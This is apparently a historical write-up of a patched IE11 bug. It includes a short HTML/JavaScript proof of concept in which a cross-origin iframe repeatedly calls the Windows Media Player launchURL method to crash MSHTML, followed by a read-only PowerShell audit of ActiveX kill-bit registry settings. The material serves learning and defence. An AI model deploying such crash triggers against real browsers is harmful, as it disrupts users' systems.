Calling the WMP launchURL method repeatedly from a cross-origin iFrame crashed IE11 with a null read in MSHTML!CElement::IsFullScreenAvailable. Classified PROBABLY_NOT_EXPLOITABLE, this appeared to be a regression of an older WMP bug.
<!-- iframe.html, served from a different domain than the top-level page -->
<object style="display:none" id="wmp" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"></object>
<script>
// Invoked at regular intervals from the cross-origin iframe; the try/catch
// swallows the script error so the calls keep coming.
function crashMe()
{
    try
    {
        document.getElementById("wmp").launchURL('http://www.bing.com&&_top');
    }
    catch(e){}
}
</script>
The launchURL call used the &&_top trick to attempt navigation of the top-level window. When called at regular intervals from a cross-origin iFrame, the WMP ActiveX control initiated a layout pass over elements in the parent document that lacked the context CElement::IsFullScreenAvailable expects, so the function dereferenced a null pointer at offset +0x91.
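The mitigation side of a bug like this, for anyone who had to manage IE fleets at the time, was the ActiveX kill bit: IE refuses to instantiate a control whose CLSID has a "Compatibility Flags" DWORD with bit 0x400 set under the ActiveX Compatibility registry key (documented by Microsoft in KB240797). The audit script below is an added example, not code from the original post; it uses the WMP CLSID from the <object> tag above, checks both the native and WOW6432Node views under HKLM, and assumes it is run on a Windows host with read access to those keys.

```powershell
# Added example: report whether the ActiveX kill bit is set for a given CLSID.
# The registry path and the 0x400 flag are the documented kill-bit mechanism
# (KB240797); the CLSID below is the WMP control from the page's <object> tag.

$WmpClsid = '{6BF52A52-394A-11d3-B153-00C04F79FAA6}'
$KillBitFlag = 0x400

function Get-ActiveXKillBitStatus {
    param(
        [Parameter(Mandatory)]
        [string]$Clsid
    )

    # Check the native view and, on 64-bit Windows, the 32-bit (WOW6432Node) view,
    # because 32-bit IE reads its compatibility flags from the latter.
    foreach ($view in '', 'WOW6432Node\') {
        $path = "HKLM:\SOFTWARE\${view}Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        $flags = $null
        if (Test-Path -Path $path) {
            $flags = (Get-ItemProperty -Path $path -ErrorAction SilentlyContinue).'Compatibility Flags'
        }
        $flagValue = if ($null -eq $flags) { 0 } else { [int]$flags }

        [pscustomobject]@{
            Path       = $path
            KeyPresent = (Test-Path -Path $path)
            Flags      = ('0x{0:X}' -f $flagValue)
            KillBitSet = (($flagValue -band $KillBitFlag) -ne 0)
        }
    }
}

# Usage: a KillBitSet of False on every row means IE would still instantiate
# the control from a web page, so a crash like the one above remains reachable
# on an unpatched system.
Get-ActiveXKillBitStatus -Clsid $WmpClsid | Format-Table -AutoSize
```

Setting the kill bit disables the control for every page, so it is a blunt instrument; in practice it was reserved for controls with no business being scriptable from the web, and a patched IE made it unnecessary for this particular bug.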
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.